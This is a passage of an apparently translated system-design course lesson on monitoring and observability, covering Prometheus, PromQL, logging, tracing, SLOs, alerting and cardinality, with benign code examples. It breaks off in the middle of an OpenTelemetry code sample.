Week 13: Monitoring & Observability

"A production system without monitoring is like flying a plane at night with no instrument panel: you have no idea whether you are cruising steadily or diving straight into the ground."

Tags: system-design monitoring observability prometheus grafana elk opentelemetry devops security Student: Hieu Prerequisites: Tuan-11-Microservices-Pattern · Tuan-12-CICD-Pipeline Related: Tuan-02-Back-of-the-envelope · Tuan-05-Load-Balancer · Tuan-09-Rate-Limiter · Tuan-14-AuthN-AuthZ-Security · Tuan-15-Data-Security-Encryption


1. Context & Why

Analogy: The Aircraft Cockpit Dashboard

Hieu, imagine you are the pilot of a Boeing 777 carrying 400 passengers across the Pacific. The cockpit holds hundreds of gauges and screens:

  • Altimeter (altitude) → the equivalent of latency: is the system responding quickly or slowly?
  • Airspeed indicator → the equivalent of throughput/traffic: how many requests are flowing through?
  • Fuel gauge → the equivalent of saturation: how much CPU/memory/disk is left?
  • Engine warning lights → the equivalent of error rate: is anything failing?
  • Black box recorder → the equivalent of logs & traces: when an incident happens, where do you look for the cause?
  • ATC communication (air traffic control) → the equivalent of alerting: who tells you when something goes wrong?

No pilot flies blind. If every instrument goes dark, the mandatory procedure is an emergency landing. Likewise, a production system without monitoring is "flying blind": you do not know when it will go down, why it went down, or where it broke.

Why do Monitoring & Observability matter?

| Without Monitoring | With Monitoring & Observability |
|---|---|
| Customers report errors → only then do you learn the system is down | An alert fires at 3AM → the on-call engineer fixes it before users notice |
| "The system is slow", with no idea where | P99 latency jumped from 50ms → 500ms in the Payment service |
| Debugging by reading code and guessing | A distributed trace shows the bottleneck is DB query #47 |
| Capacity planning = gut feeling | Metrics show CPU will hit 90% within 14 days |
| Postmortem = "probably the new deploy" | Logs + traces + metrics = precise root cause analysis |

Monitoring vs Observability — what is the difference?

| | Monitoring | Observability |
|---|---|---|
| Question | "Is the system working?" | "Why is the system behaving this way?" |
| Approach | Known unknowns: you decide in advance what to watch | Unknown unknowns: uncover problems you never anticipated |
| Output | Dashboards, alerts | The ability to drill down, correlate, explore |
| Analogy | The check-engine light in a car | A mechanic plugging an OBD-II diagnostic reader into the car |
| Example | CPU > 90% → alert | "Why did latency triple only for users in VN at 9PM?" |

Monitoring is a subset of Observability. Monitoring tells you what is broken. Observability helps you understand why it broke, even when you have never seen that failure before.


2. Deep Dive — Core Concepts

2.1 The Three Pillars of Observability

┌─────────────────────────────────────────────────┐
│              OBSERVABILITY                        │
│                                                   │
│   ┌──────────┐  ┌──────────┐  ┌──────────────┐  │
│   │ METRICS  │  │  LOGS    │  │   TRACES     │  │
│   │          │  │          │  │              │  │
│   │ "What"   │  │ "Why"    │  │ "Where"      │  │
│   │ is       │  │ did it   │  │ did it       │  │
│   │ happening│  │ happen   │  │ happen       │  │
│   └──────────┘  └──────────┘  └──────────────┘  │
│                                                   │
│   Prometheus     ELK Stack    OpenTelemetry       │
│   Grafana        Fluentd      Jaeger / Zipkin     │
│   Datadog        Loki                             │
└─────────────────────────────────────────────────┘

Pillar 1: Metrics

Metrics are numeric data describing the state of the system at a point in time, collected at a fixed interval.

| Metric Type | Description | Examples |
|---|---|---|
| Counter | Only ever increases; resets on restart | http_requests_total, errors_total |
| Gauge | Goes up and down | cpu_usage_percent, memory_used_bytes, active_connections |
| Histogram | Distributes observations into buckets | http_request_duration_seconds (p50, p90, p99) |
| Summary | Like a histogram, but quantiles are computed client-side | go_gc_duration_seconds |

When to use a Histogram vs a Summary?

  • Histogram: when you need to aggregate across instances (the more common choice, used with Prometheus)
  • Summary: when you need precise quantiles on a single instance and never need to aggregate

Key properties of metrics (see the instrumentation sketch after this list):

  • Cheap to store: each data point is ~16 bytes (timestamp + value)
  • Fast to query: time-series databases are optimized for range queries
  • Good for alerting: thresholds are easy to set
  • Downside: no detailed context (you learn "error rate went up", not "which error, where, for which user")
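
A minimal instrumentation sketch of all four types with the official Python client (prometheus_client); the metric names echo the table above, while the port, labels, and buckets are illustrative:

# pip install prometheus-client
import time
from prometheus_client import Counter, Gauge, Histogram, Summary, start_http_server

REQUESTS = Counter("http_requests_total", "Total HTTP requests",
                   ["method", "status"])                    # only ever increases
ACTIVE = Gauge("active_connections", "Open connections")    # goes up and down
LATENCY = Histogram("http_request_duration_seconds", "Request latency",
                    buckets=[0.01, 0.05, 0.1, 0.2, 0.5, 1, 2, 5])
GC_PAUSE = Summary("gc_pause_seconds", "GC pause duration") # client-side quantiles

def handle_request():
    ACTIVE.inc()
    with LATENCY.time():              # records the duration into the buckets
        REQUESTS.labels(method="GET", status="200").inc()
    ACTIVE.dec()

if __name__ == "__main__":
    start_http_server(8080)           # exposes /metrics for Prometheus to scrape
    while True:
        handle_request()
        time.sleep(0.1)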

Pillar 2: Logs

Logs are discrete event records carrying detailed information about what happened.

Three common log formats:

| Format | Example | Pros | Cons |
|---|---|---|---|
| Plaintext | 2024-01-15 10:30:45 ERROR Payment failed for user 123 | Human-readable | Hard to parse, hard to search |
| Structured (JSON) | {"timestamp":"2024-01-15T10:30:45Z","level":"ERROR","service":"payment","user_id":"123","error":"insufficient_funds"} | Machine-parseable, filterable | More verbose |
| Binary | Protobuf-encoded log | Compact, fast | Needs special tooling to read |

Best practice: always use structured logging (JSON). The reason: with 100 services each emitting 10K logs/second, you cannot grep plaintext. You need jq, Elasticsearch, or Loki to filter service=payment AND level=ERROR AND user_id=123.

Standard structured logging fields:

{
  "timestamp": "2024-01-15T10:30:45.123Z",
  "level": "ERROR",
  "service": "payment-service",
  "instance": "payment-7b4f9d8c-x2k9p",
  "trace_id": "abc123def456",
  "span_id": "span789",
  "user_id": "usr_12345",
  "method": "POST",
  "path": "/api/v1/payments",
  "status_code": 500,
  "duration_ms": 2345,
  "error": "database_connection_timeout",
  "message": "Failed to process payment: connection pool exhausted"
}
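
The fields above can be produced with nothing but the standard library; a minimal sketch (real projects usually reach for structlog or python-json-logger; the service name and fields here are illustrative):

import json
import logging
import sys
import time

class JsonFormatter(logging.Formatter):
    def format(self, record):
        event = {
            "timestamp": time.strftime("%Y-%m-%dT%H:%M:%SZ",
                                       time.gmtime(record.created)),
            "level": record.levelname,
            "service": "payment-service",
            "message": record.getMessage(),
        }
        event.update(getattr(record, "fields", {}))  # merge structured fields
        return json.dumps(event)                     # escaping blocks log injection

handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(JsonFormatter())
log = logging.getLogger("payment")
log.addHandler(handler)
log.setLevel(logging.INFO)

log.error("Failed to process payment", extra={"fields": {
    "user_id": "usr_12345", "error": "database_connection_timeout",
    "trace_id": "abc123def456", "duration_ms": 2345,
}})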

Pillar 3: Traces (Distributed Tracing)

Traces follow a single request as it travels through multiple services in a distributed system.

User Request (trace_id: abc-123)
│
├── [Span 1] API Gateway          ─── 2ms
│   ├── [Span 2] Auth Service     ─── 5ms
│   ├── [Span 3] Payment Service  ─── 150ms  ← Bottleneck!
│   │   ├── [Span 4] DB Query     ─── 120ms  ← Root cause!
│   │   └── [Span 5] Redis Cache  ─── 1ms
│   └── [Span 6] Notification Svc ─── 10ms
│
Total: 168ms

Key concepts:

| Term | Meaning |
|---|---|
| Trace | The entire journey of one request through the system (made up of many spans) |
| Span | A single operation within a trace (e.g. one DB query, one HTTP call) |
| Trace ID | A unique ID identifying the whole trace, propagated through every service |
| Span ID | A unique ID for each span |
| Parent Span ID | The parent span, forming a tree structure |
| Context Propagation | The mechanism carrying trace_id/span_id between services (usually via HTTP headers) |

Context propagation headers:

traceparent: 00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01
tracestate: vendor=value

W3C Trace Context is the standard that OpenTelemetry uses; the traceparent header carries a version, a 32-hex-digit trace ID, a 16-hex-digit parent span ID, and flags. Before it, every vendor had its own format (Zipkin used X-B3-TraceId, Jaeger used uber-trace-id).
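
A minimal propagation sketch with the OpenTelemetry Python SDK: inject() writes the traceparent header on the calling side, extract() restores the context on the receiving side. The downstream URL and function names are illustrative:

import requests
from opentelemetry import trace
from opentelemetry.propagate import inject, extract

tracer = trace.get_tracer("checkout")

def call_payment_service(order: dict):
    with tracer.start_as_current_span("charge-card"):
        headers = {}
        inject(headers)   # adds traceparent (and tracestate) for the current span
        return requests.post("http://payment-service/api/v1/payments",
                             json=order, headers=headers)

# On the payment-service side:
def handle_payment(request_headers: dict, body: dict):
    ctx = extract(request_headers)   # rebuild the caller's trace context
    with tracer.start_as_current_span("process-payment", context=ctx):
        pass                         # this span joins the same trace as a child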

2.2 Prometheus Architecture — The Standard Metrics System

Prometheus is an open-source monitoring system, graduated by the Cloud Native Computing Foundation (CNCF), the same maturity level as Kubernetes.

Architecture overview

┌──────────────────────────────────────────────────────────────┐
│                    PROMETHEUS ECOSYSTEM                        │
│                                                                │
│  ┌─────────────┐     PULL (scrape)     ┌──────────────────┐  │
│  │ Target Apps │ ◄──────────────────── │   Prometheus     │  │
│  │ /metrics    │      every 15s        │   Server         │  │
│  │             │                        │                  │  │
│  │ - app:8080  │                        │ ┌──────────────┐│  │
│  │ - node:9100 │                        │ │  Retrieval   ││  │
│  │ - mysql:9104│                        │ │  (Scraper)   ││  │
│  └─────────────┘                        │ └──────┬───────┘│  │
│                                          │        │        │  │
│  ┌─────────────┐                        │ ┌──────▼───────┐│  │
│  │ Service     │  service discovery     │ │    TSDB      ││  │
│  │ Discovery   │───────────────────────►│ │ (Time Series ││  │
│  │             │                        │ │  Database)   ││  │
│  │ - k8s API   │                        │ └──────┬───────┘│  │
│  │ - consul    │                        │        │        │  │
│  │ - DNS       │                        │ ┌──────▼───────┐│  │
│  │ - file_sd   │                        │ │   PromQL     ││  │
│  └─────────────┘                        │ │ (Query Lang) ││  │
│                                          │ └──────┬───────┘│  │
│                                          └────────┼────────┘  │
│                                                   │           │
│           ┌───────────────────┬───────────────────┤           │
│           │                   │                   │           │
│    ┌──────▼──────┐    ┌──────▼──────┐    ┌───────▼───────┐  │
│    │  Grafana    │    │ Alertmanager│    │ API Consumers │  │
│    │ (Dashboard) │    │             │    │               │  │
│    │             │    │ - Routing   │    │ - Custom UI   │  │
│    │ - Charts    │    │ - Grouping  │    │ - Scripts     │  │
│    │ - Alerts    │    │ - Silencing │    │ - CI/CD       │  │
│    │ - Tables    │    │ - Inhibit   │    └───────────────┘  │
│    └─────────────┘    │             │                        │
│                        │ ┌─────────┐│                        │
│                        │ │PagerDuty││                        │
│                        │ │Slack    ││                        │
│                        │ │Email    ││                        │
│                        │ └─────────┘│                        │
│                        └─────────────┘                        │
└──────────────────────────────────────────────────────────────┘

Pull-based Model (why does Prometheus "pull" instead of receiving pushes?)

| | Pull (Prometheus) | Push (Datadog, InfluxDB) |
|---|---|---|
| Mechanism | Prometheus actively calls each target's /metrics endpoint | The app actively sends metrics to a collector |
| Pros | Easy to tell whether a target is alive (scrape fails → target is down); no collector config needed in the app | The app does not need to be discoverable; good for short-lived jobs |
| Cons | Needs service discovery; awkward for short-lived jobs | Hard to detect dead targets; DDoS risk when many apps push at once |
| Workaround | Use the Pushgateway for batch/cron jobs (sketch below) | Rate limiting at the collector |
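
A minimal Pushgateway sketch for the batch-job workaround named in the table, using prometheus_client; the gateway address, job name, and metric names are illustrative:

from prometheus_client import CollectorRegistry, Gauge, push_to_gateway

def nightly_backup():
    registry = CollectorRegistry()
    duration = Gauge("backup_duration_seconds", "Backup duration",
                     registry=registry)
    last_success = Gauge("backup_last_success_timestamp_seconds",
                         "Unixtime of the last successful backup",
                         registry=registry)

    with duration.time():            # run the actual backup work here
        pass
    last_success.set_to_current_time()

    # The job pushes once and exits; Prometheus scrapes the gateway instead
    # of the (already dead) short-lived process.
    push_to_gateway("pushgateway:9091", job="nightly-backup", registry=registry)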

TSDB — Time Series Database

Prometheus stores data in its own purpose-built TSDB, optimized for time-series workloads:

Data format:

metric_name{label1="value1", label2="value2"} value timestamp

# Examples:
http_requests_total{method="GET", path="/api/users", status="200"} 15234 1705312245
http_requests_total{method="POST", path="/api/orders", status="500"} 42 1705312245
node_cpu_seconds_total{cpu="0", mode="idle"} 98234.56 1705312245

TSDB Internal Structure:

data/
├── 01BKGV7JBM69T2G1BGBGM6KB12/   # Block (2h default)
│   ├── chunks/                      # Compressed time-series data
│   │   └── 000001
│   ├── tombstones                   # Deleted data markers
│   ├── index                        # Inverted index (label → series)
│   └── meta.json                    # Block metadata
├── 01BKGTZQ1SYQJTR4PB43C8PD98/   # Another block
├── 01BKGTZQ1HHWHV8FBJXW1Y3W0K/
├── chunks_head/                     # Current (in-memory) block
│   └── 000001
└── wal/                             # Write-Ahead Log
    ├── 000000002
    └── 000000003
  • Block: each block holds 2 hours of data (default) and is immutable once compacted
  • Compaction: older blocks are merged to reduce I/O at query time
  • WAL (Write-Ahead Log): ensures no data is lost if Prometheus crashes before a block is persisted
  • Retention: 15 days by default, configurable

PromQL — Prometheus Query Language

PromQL is a powerful query language for time-series data, and a mandatory skill for every DevOps/SRE engineer.

The most important queries:

# === INSTANT VECTOR (the value at a single point in time) ===

# Current value of the request counter
http_requests_total

# Filter by label
http_requests_total{method="GET", status=~"2.."}

# === RANGE VECTOR (values over a time window) ===

# Raw samples from the last 5 minutes
http_requests_total[5m]

# === FUNCTIONS ===

# Rate: average requests/second over 5 minutes (the most important function!)
rate(http_requests_total[5m])

# QPS by method
sum by (method) (rate(http_requests_total[5m]))

# Error rate (%)
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
* 100

# P99 latency (from a histogram)
histogram_quantile(0.99,
  sum by (le) (rate(http_request_duration_seconds_bucket[5m]))
)

# P50 (median) latency per service
histogram_quantile(0.50,
  sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
)

# CPU usage (%)
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100)

# Memory usage (%)
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100

# How long until the disk fills (predicted free bytes 30 days out)
predict_linear(node_filesystem_avail_bytes[7d], 30*24*3600)

# Top 5 endpoints by QPS
topk(5, sum by (path) (rate(http_requests_total[5m])))

# Increase: total growth over a window (for counters)
increase(http_requests_total{status="500"}[1h])

2.3 Grafana Dashboards

Grafana is the standard visualization platform, supporting many datasources (Prometheus, Elasticsearch, Loki, InfluxDB, CloudWatch…).

Dashboards are organized in layers:

| Layer | Dashboards | Audience |
|---|---|---|
| Business | Revenue, Active Users, Conversion Rate | Stakeholders, Product Managers |
| Application | QPS, Latency, Error Rate, Saturation | Developers, SRE |
| Infrastructure | CPU, Memory, Disk, Network | SRE, DevOps |
| Database | Query latency, Connection pool, Replication lag | DBA, Backend |
| Network | Packet loss, Bandwidth, DNS resolution | Network Engineers |

2.4 ELK Stack — Centralized Logging

ELK = Elasticsearch + Logstash + Kibana (these days usually called the Elastic Stack, since Beats joined the family).

┌──────────┐    ┌──────────┐    ┌───────────────┐    ┌──────────┐
│  Apps    │    │  Beats   │    │   Logstash    │    │ Elastic  │
│          │───►│(Filebeat)│───►│               │───►│ search   │
│ stdout/  │    │          │    │ - Parse       │    │          │
│ file log │    │ Lightwt  │    │ - Transform   │    │ Index &  │
│          │    │ shipper  │    │ - Enrich      │    │ Search   │
└──────────┘    └──────────┘    │ - Filter PII  │    └────┬─────┘
                                └───────────────┘         │
                                                    ┌─────▼─────┐
                                                    │  Kibana   │
                                                    │           │
                                                    │ - Search  │
                                                    │ - Visualize│
                                                    │ - Dashboard│
                                                    │ - Alerting │
                                                    └───────────┘

What does each component do?

| Component | Role | Analogy |
|---|---|---|
| Beats (Filebeat) | Lightweight agent that reads log files and forwards them | The mail carrier collecting letters from every house |
| Logstash | Data processing pipeline: parse, transform, enrich, filter | The post office sorting the mail |
| Elasticsearch | Distributed search & analytics engine; stores and indexes logs | A giant library with a catalog |
| Kibana | Web UI for search, visualization, dashboards | The librarian who helps you find the book |

A lighter alternative: the PLG stack (Promtail + Loki + Grafana). Grafana Loki is designed like Prometheus but for logs: it indexes only labels (no full-text index like Elasticsearch), making storage far cheaper.

2.5 Distributed Tracing — OpenTelemetry, Jaeger, Zipkin

OpenTelemetry (OTel)

OpenTelemetry is the open standard for observability, created by merging OpenTracing and OpenCensus. It is a vendor-neutral CNCF project.

Why does OTel matter?

  • No vendor lock-in: instrument once, export to any backend (Jaeger, Zipkin, Datadog, New Relic, Grafana Tempo…)
  • Unified API: one SDK for Metrics + Logs + Traces
  • Auto-instrumentation: libraries for most frameworks (Express, Flask, Spring Boot…)
  • Industry standard: AWS, Google, Microsoft, and Datadog all support it
┌─────────────────────────────────────────────────────────┐
│               OPENTELEMETRY ARCHITECTURE                 │
│                                                           │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐               │
│  │ Service A│  │ Service B│  │ Service C│               │
│  │ (OTel    │  │ (OTel    │  │ (OTel    │               │
│  │  SDK)    │  │  SDK)    │  │  SDK)    │               │
│  └────┬─────┘  └────┬─────┘  └────┬─────┘               │
│       │              │              │                     │
│       └──────────────┼──────────────┘                     │
│                      │                                    │
│              ┌───────▼────────┐                           │
│              │  OTel Collector│                           │
│              │                │                           │
│              │ ┌────────────┐ │                           │
│              │ │ Receivers  │ │  OTLP, Jaeger, Zipkin    │
│              │ └─────┬──────┘ │                           │
│              │ ┌─────▼──────┐ │                           │
│              │ │ Processors │ │  Batch, Filter, Sample   │
│              │ └─────┬──────┘ │                           │
│              │ ┌─────▼──────┐ │                           │
│              │ │ Exporters  │ │  Jaeger, Zipkin, OTLP    │
│              │ └─────┬──────┘ │                           │
│              └───────┼────────┘                           │
│                      │                                    │
│         ┌────────────┼────────────┐                       │
│         │            │            │                       │
│    ┌────▼───┐  ┌─────▼────┐  ┌───▼──────┐               │
│    │ Jaeger │  │ Grafana  │  │ Datadog  │               │
│    │        │  │ Tempo    │  │ / others │               │
│    └────────┘  └──────────┘  └──────────┘               │
└─────────────────────────────────────────────────────────┘

Jaeger vs Zipkin

| | Jaeger | Zipkin |
|---|---|---|
| Origin | Uber (CNCF graduated) | Twitter (open-source) |
| Language | Go | Java |
| Storage | Cassandra, Elasticsearch, Kafka, Badger | Cassandra, Elasticsearch, MySQL |
| UI | Richer, with a dependency graph | Simpler, lightweight |
| Sampling | Adaptive sampling (head + tail) | Fixed-rate sampling |
| When to use | Large production systems needing adaptive sampling | Quick setup, small-to-medium systems |

2.6 SLO / SLA / SLI — The Common Language of Reliability

These three concepts are the foundation of Site Reliability Engineering (SRE), popularized by Google.

| Term | Short for | Meaning | Example |
|---|---|---|---|
| SLI | Service Level Indicator | A metric that measures quality of service | Request success rate: 99.95% |
| SLO | Service Level Objective | An internal target for an SLI | "99.9% of requests must return in < 200ms" |
| SLA | Service Level Agreement | A customer contract, with consequences for violations | "If uptime < 99.95%, customers are refunded 10% of fees" |

The relationship: SLI (measure) → SLO (internal target, stricter than the SLA) → SLA (commitment to customers)

A concrete example for an API service:

| SLI | SLO | SLA |
|---|---|---|
| Availability (% of successful requests) | 99.95% over 30 days | 99.9%; violation → 10% credit |
| Latency P99 | < 200ms | < 500ms; violation → 5% credit |
| Error rate | < 0.05% | < 0.1%; violation → 5% credit |

Error Budget

Error budget = the amount of "allowed failure" implied by the SLO. The concept matters enormously because it turns reliability into a number you can measure and spend.

Example: SLO = 99.9% availability over 30 days

→ Error budget = (1 − 0.999) × 30 days = 0.1% of 43,200 minutes = 43.2 minutes of downtime per month

Error Budget Policy (what happens as the budget runs out):

| Error budget remaining | Action |
|---|---|
| > 50% | Normal development, deploy freely |
| 25% – 50% | More review, limit risky deploys |
| 5% – 25% | Feature freeze, focus on stability |
| 0% (exhausted) | Code freeze: only bug fixes and reliability improvements |

Aha moment: the error budget balances velocity (shipping features fast) against reliability (keeping the system stable). The old argument of "Dev wants to deploy, Ops wants stability" disappears; the error budget is an objective number.
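
The budget and burn-rate arithmetic as a small sketch (a 30-day window, matching the example above):

def error_budget_minutes(slo: float, window_days: int = 30) -> float:
    """Allowed downtime implied by an availability SLO."""
    return (1 - slo) * window_days * 24 * 60

def burn_rate(observed_error_rate: float, slo: float) -> float:
    """How many times faster than allowed the budget is being spent."""
    return observed_error_rate / (1 - slo)

print(f"{error_budget_minutes(0.999):.1f}")   # 43.2 minutes per 30 days
print(f"{burn_rate(0.005, 0.999):.1f}")       # 5.0 → budget gone in 30/5 = 6 days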

2.7 Golden Signals (Google SRE Book)

Google proposes four metrics as the most important to monitor for every service:

| Signal | Meaning | PromQL Example |
|---|---|---|
| Latency | Time to serve a request (track success and error latency separately) | histogram_quantile(0.99, sum by(le)(rate(http_request_duration_seconds_bucket[5m]))) |
| Traffic | Demand on the system (requests/s, transactions/s) | sum(rate(http_requests_total[5m])) |
| Errors | Fraction of failed requests (explicit 5xx; implicit: wrong results) | sum(rate(http_requests_total{status=~"5.."}[5m])) / sum(rate(http_requests_total[5m])) |
| Saturation | How "full" a resource is (CPU, memory, disk, connections) | (1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) |

Why are these four signals enough? Because they cover four questions: "Is it slow?" (Latency), "Is it busy?" (Traffic), "Is it failing?" (Errors), "Is it overloaded?" (Saturation).

2.8 RED Method vs USE Method

Two frameworks that complement the Golden Signals, applied to different kinds of components:

RED Method (for services/microservices — Tom Wilkie, Grafana Labs)

| Metric | Meaning | Applies to |
|---|---|---|
| Rate | Requests per second | Every service |
| Errors | Failed requests per second | Every service |
| Duration | Distribution of request latency | Every service |

RED = the Golden Signals minus Saturation. It focuses on user experience.

USE Method (for resources/infrastructure — Brendan Gregg, Netflix)

| Metric | Meaning | Applies to |
|---|---|---|
| Utilization | % of time the resource is busy | CPU, Disk, Network |
| Saturation | Amount of queued/pending work | Queue depth, swap usage |
| Errors | Error events | Hardware errors, network drops |

USE is applied per hardware resource: CPU, Memory, Disk I/O, Network I/O.

Which one when?

| Target | Use | Example |
|---|---|---|
| API endpoint | RED | /api/v1/payments — Rate, Errors, Duration |
| Kubernetes pod | USE | CPU utilization, memory saturation, OOM errors |
| Database | Both | RED for queries; USE for disk I/O, connections |
| Message queue | USE | Queue depth (saturation), consumer lag, message errors |

2.9 Alerting Strategy

Severity Levels

| Level | When | Response Time | Who | Channel |
|---|---|---|---|---|
| P1 / Critical | Service down, data loss, security breach | < 5 minutes | On-call engineer + manager | PagerDuty (phone call), SMS |
| P2 / High | Degraded performance, partial outage | < 30 minutes | On-call engineer | PagerDuty, Slack incidents |
| P3 / Warning | Approaching a threshold, non-critical error spike | < 4 hours (business hours) | Team lead | Slack alerts |
| P4 / Info | Anomaly detected, capacity planning | Next business day | Team via weekly review | Email, dashboard |

Escalation Policy

Time 0    → On-call Primary receives alert
            ↓ (no ack in 5 min)
Time +5m  → On-call Secondary receives alert
            ↓ (no ack in 10 min)
Time +15m → Engineering Manager receives alert
            ↓ (no ack in 15 min)
Time +30m → VP Engineering / CTO receives alert
            ↓ (auto-conference bridge opened)
Time +45m → Incident Commander declared, war room

Alerting Best Practices

| Do | Don't |
|---|---|
| Alert on symptoms (user-facing: latency, errors) | Alert on causes (high CPU might be fine during a batch job) |
| Set alerts based on SLO burn rate | Set arbitrary thresholds without SLO context |
| Use multi-window alerting (5min AND 1hr) | Alert on a single data point (noisy) |
| Include a runbook link in the alert | Send alerts with no context or action |
| Page only for user-impacting issues | Page for every warning (alert fatigue) |
| Review and tune alerts monthly | Set and forget |

SLO-based Alerting (Google's Burn Rate)

Instead of alerting on "error rate > 1%", use the burn rate: the speed at which the error budget is being consumed.

Example: SLO = 99.9%, observed error rate = 0.5%

→ The budget is burning 5x faster than allowed (0.5% / 0.1% = 5). At this pace the error budget runs out in 30 / 5 = 6 days instead of 30.

Multi-window alerting rules:

| Severity | Burn Rate | Short Window | Long Window | Alert After |
|---|---|---|---|---|
| P1 | 14.4x | 5 minutes | 1 hour | Immediately: budget exhausted in ~2 days |
| P2 | 6x | 30 minutes | 6 hours | Budget exhausted in 5 days |
| P3 | 1x | 6 hours | 3 days | Budget burning at exactly the rate that empties it by month's end |

2.10 The Cardinality Explosion Problem — A Deadly Trap

Cardinality = the number of unique time series (unique combinations of metric name + label values).

A safe example:

http_requests_total{method="GET", status="200"}   # method: ~5 values, status: ~10 values
# Cardinality = 5 × 10 = 50 series → OK

A DANGEROUS example:

http_requests_total{method="GET", user_id="usr_12345", request_id="req_abc"}
# user_id: 10M values, request_id: infinite
# Cardinality = 5 × 10M × ∞ = EXPLOSION 💥

Why is cardinality explosion dangerous?

| Consequence | Detail |
|---|---|
| Memory OOM | Prometheus keeps every active series in RAM |
| Query timeouts | A PromQL query over 10M series pins the CPU at 100% |
| Disk explosion | ~16 bytes/sample × 4 samples/min × 10M series = 640MB/min ≈ 922GB/day |
| Billing shock | On managed services (Datadog, Grafana Cloud), every custom metric costs real money |

The golden rule: NEVER use high-cardinality values as labels:

  • User ID
  • Request ID / Trace ID
  • IP address
  • Email
  • URL path (with path params: /users/123 → unbounded)

Instead: use labels with bounded cardinality (method, status_code, service_name, region, pod_name). If you need user-level data, that belongs in logs or traces, not metrics. A normalization sketch follows below.
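
A minimal sketch of that rule applied to URL paths: collapse unbounded path parameters into route templates before using the path as a label (the patterns are illustrative, not exhaustive):

import re

ROUTE_PATTERNS = [
    (re.compile(r"^/api/v1/users/[^/]+$"), "/api/v1/users/{id}"),
    (re.compile(r"^/api/v1/orders/[^/]+/items$"), "/api/v1/orders/{id}/items"),
]

def normalize_path(path: str) -> str:
    """Map a concrete URL to a bounded route template."""
    for pattern, template in ROUTE_PATTERNS:
        if pattern.match(path):
            return template
    return "/other"   # unknown paths share one bucket instead of exploding

# /users/123 and /users/456 now land in the SAME series:
# http_requests_total{path="/api/v1/users/{id}"} rather than one series per user
print(normalize_path("/api/v1/users/123"))   # → /api/v1/users/{id}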

2.11 Modern Observability — High-Cardinality Structured Events

2024-2026 update: Honeycomb-style "high-cardinality structured events" are gradually displacing the old separation into Metrics + Logs + Traces. This is the modern viewpoint formalized by Charity Majors (CTO of Honeycomb) and Liz Fong-Jones in Observability Engineering (O'Reilly, 2022).

2.11.1 Problems with the traditional three pillars

Section 2.1 above describes the three pillars: Metrics + Logs + Traces. In modern production systems they run into four big problems:

| Problem | Detail |
|---|---|
| Pre-aggregation kills detail | Metrics only carry aggregates (P99 = 200ms); you cannot see WHO got the 200ms |
| Cardinality limits | Metrics cannot handle user_id or request_id labels |
| Three silos that are hard to correlate | Metric spikes → find the log → find the trace = 3 tools, 3 query languages |
| "Known unknowns" only | You must know in advance what to monitor, so "unknown unknowns" stay invisible |

2.11.2 The Solution: High-Cardinality Structured Events

The core idea: every request emits one wide event with hundreds of fields:

{
  "timestamp": "2026-05-01T10:30:45.123Z",
  "service": "checkout-api",
  "instance": "checkout-7b4f9d8c-x2k9p",
  "region": "us-east-1",
  "trace_id": "abc123",
  "span_id": "span789",
 
  "user_id": "usr_12345",
  "user_tier": "premium",
  "user_country": "VN",
  "session_id": "sess_xyz",
 
  "request_method": "POST",
  "request_path": "/api/v1/checkout",
  "request_size_bytes": 2048,
 
  "response_status": 200,
  "response_size_bytes": 512,
  "duration_ms": 234,
 
  "db_query_count": 5,
  "db_total_time_ms": 145,
  "cache_hit": true,
  "cache_lookup_count": 3,
 
  "feature_flag_a": true,
  "feature_flag_b": false,
  "experiment_arm": "control",
 
  "build_id": "v2.45.1",
  "deploy_id": "deploy-abc",
 
  "downstream_service": "payment-api",
  "downstream_duration_ms": 89,
  "downstream_retry_count": 1,
 
  "error": null,
  "error_message": null,
  "warnings": ["slow_query"]
}

Every field is a dimension you can slice and dice on.

Why this is better:

  • You can ask: "P99 latency for premium users in VN with feature flag A enabled, on build v2.45.1, since the latest deploy"
  • "Unknown unknowns" become reachable through dynamic drill-down; no predefined dashboards required
  • A single tool with a single query language (a wide-event emitter sketch follows this list)
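
A minimal sketch of the pattern, sometimes called a canonical log line: build one dict per request, enrich it while the request is processed, and emit it exactly once at the end. The stand-in business logic and field values are illustrative:

import json
import sys
import time
import uuid

def process_checkout() -> int:
    """Stand-in for the real business logic; returns an HTTP status."""
    return 200

def handle_request(user_id: str, user_tier: str, path: str, flags: dict) -> None:
    event = {
        "timestamp": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "service": "checkout-api",
        "trace_id": uuid.uuid4().hex,
        "user_id": user_id,        # high-cardinality fields are fine here,
        "user_tier": user_tier,    # unlike metric labels (see section 2.10)
        "request_path": path,
        "feature_flag_new_pricing": flags.get("new_pricing", False),
        "build_id": "v2.45.1",
    }
    start = time.monotonic()
    try:
        event["response_status"] = process_checkout()
    except Exception as exc:
        event["response_status"], event["error"] = 500, type(exc).__name__
        raise
    finally:
        event["duration_ms"] = round((time.monotonic() - start) * 1000, 2)
        print(json.dumps(event), file=sys.stdout)   # one wide event per request

handle_request("usr_12345", "premium", "/api/v1/checkout", {"new_pricing": True})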

2.11.3 Comparison: Metrics vs Structured Events

| | Metrics (Prometheus) | Structured Events (Honeycomb-style) |
|---|---|---|
| Storage cost/event | ~16 bytes (TSDB-optimized) | ~1-5KB (the full event) |
| Cardinality | Low (~10K series/host) | Unbounded (each event stands alone) |
| Aggregation | Pre-aggregated (P99 over 1m buckets) | On the fly (computed from raw events) |
| Drill-down | Limited (only the labels you already have) | Unlimited (any field) |
| Cost | Cheap | Pricier (every event stored in full) |
| Best for | High-volume, low-cardinality data (CPU, network) | High-cardinality, business-logic insight |

Caveat: this is not a wholesale replacement; the two are complementary. Metrics remain the right tool for infrastructure. Events shine for application and business questions.

2.11.4 OpenTelemetry Span Events — Best of Both

OpenTelemetry traces with span attributes can act as structured events, because every span can carry an effectively unlimited set of attributes:

import os

from opentelemetry import trace

tracer = trace.get_tracer(__name__)

# get_user_tier, get_user_country, calculate_total, and flag_enabled are
# application-specific helpers assumed to exist elsewhere in the codebase.
@app.post("/checkout")
def checkout(user_id, items):
    with tracer.start_as_current_span("checkout") as span:
        # Set rich attributes (high cardinality is OK in traces)
